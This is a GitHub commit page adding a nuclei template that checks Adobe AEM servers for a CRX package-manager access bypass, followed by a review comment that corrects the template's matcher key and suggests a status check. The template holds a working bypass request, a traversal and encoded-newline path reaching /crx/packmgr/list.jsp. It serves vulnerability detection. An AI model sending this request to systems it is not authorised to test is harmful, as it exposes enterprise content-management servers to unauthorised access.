Create aem-crx-bypass.yaml

patch-1
Dhiyaneshwaran 2021-06-28 20:20:58 +05:30 committed by GitHub
parent ae02065c0c
commit 91b673ad17
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions


@ -0,0 +1,22 @@
id: aem-crx-bypass
info:
author: dhiyaneshDK
name: AEM CRX Bypass
severity: critical
reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
tags: aem
requests:
- raw:
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Referer: {{BaseURL}}
Connection: close
Accept-Encoding: gzip, deflate
matchers:
- type: word
word:
- "results:"
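Review bot: The matcher at the end of the template is keyed `word:`, but nuclei's word matcher reads its list from `words:`, so the `"results:"` string is probably never applied, or the template fails to load, depending on the engine version. Even with the key corrected, one generic substring and no status check is thin evidence for a finding rated `critical`, because any response body containing `results:` would be reported. Combine the body match with a `200` status check under `matchers-condition: and`, and consider adding strings specific to the package-manager listing response. The page shows the file without its indentation, so the nesting in the sketch below is assumed.

```yaml
# … unchanged: id, info, raw request …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "results:"
      - type: status
        status:
          - 200
```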